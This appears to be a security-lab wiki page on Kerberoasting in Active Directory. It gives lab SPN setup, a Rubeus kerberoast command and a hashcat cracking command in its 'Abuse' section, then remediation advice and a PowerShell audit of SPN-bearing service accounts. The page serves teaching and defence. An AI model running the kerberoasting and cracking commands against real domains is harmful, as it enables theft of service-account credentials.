Kerberoasting
Making the Lab
Set up a general AD lab.
Add a new user called SQLService.
Open a cmd prompt on the DC and register an SPN for that account:
    setspn -a <DC-NAME>/SQLService.<domain>.local:60111 <DOMAIN>\SQLService
You can then verify that the SPN can be found:
    setspn -T <DOMAIN>.local -Q */*
Abuse
Rubeus is the simplest way:
    rubeus.exe kerberoast /simple /nowrap
Then use Hashcat to crack the hash:
    hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force
Fixing
You could remove the SPN from the account, but that would break whatever relies on it.
The real fix is to use a strong password for the service account. The password can be changed with:
    net user SQLService NewPasswordThatShouldBeStrong
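To find which service accounts need that fix, the audit below lists every user account that carries an SPN, with its password age and permitted Kerberos encryption types. It is an added example, not part of the original page; it assumes the RSAT ActiveDirectory module is installed, and the 365-day threshold is an illustrative value.

```powershell
# Added example: audit user accounts that have an SPN registered.
# Assumes the RSAT ActiveDirectory module; run with rights to read the directory.
Import-Module ActiveDirectory

# Assumption: illustrative rotation threshold, not a value from the page.
$MaxPasswordAgeDays = 365

# msDS-SupportedEncryptionTypes bit flags.
# Hashcat mode 13100 (used above) targets etype 23, i.e. RC4-HMAC tickets.
$RC4 = 0x4
$AES = 0x18   # AES128 (0x8) + AES256 (0x10)

# User objects only (no computer accounts) that have at least one SPN.
$filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))'
$props  = 'servicePrincipalName', 'PasswordLastSet', 'PasswordNeverExpires',
          'msDS-SupportedEncryptionTypes'

$report = Get-ADUser -LDAPFilter $filter -Properties $props |
    Where-Object { $_.SamAccountName -ne 'krbtgt' } |
    ForEach-Object {
        # An unset attribute casts to 0: the domain default etypes then apply.
        $enc = [int]($_.'msDS-SupportedEncryptionTypes')

        # PasswordLastSet is empty when the password must change at next logon.
        $age = $null
        if ($_.PasswordLastSet) {
            $age = (New-TimeSpan -Start $_.PasswordLastSet -End (Get-Date)).Days
        }

        [pscustomobject]@{
            Account              = $_.SamAccountName
            SPNs                 = $_.servicePrincipalName -join '; '
            PasswordAgeDays      = $age
            PasswordNeverExpires = $_.PasswordNeverExpires
            EncTypesUnset        = ($enc -eq 0)
            RC4Permitted         = (($enc -band $RC4) -ne 0)
            AESPermitted         = (($enc -band $AES) -ne 0)
            StalePassword        = ($null -ne $age -and $age -gt $MaxPasswordAgeDays)
        }
    }

# Oldest passwords first: these are the accounts to rotate first.
$report | Sort-Object PasswordAgeDays -Descending | Format-Table -AutoSize
```

Accounts that show an old password together with `RC4Permitted` or `EncTypesUnset` are the first candidates for a long, random replacement password.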
Last modified
2yr ago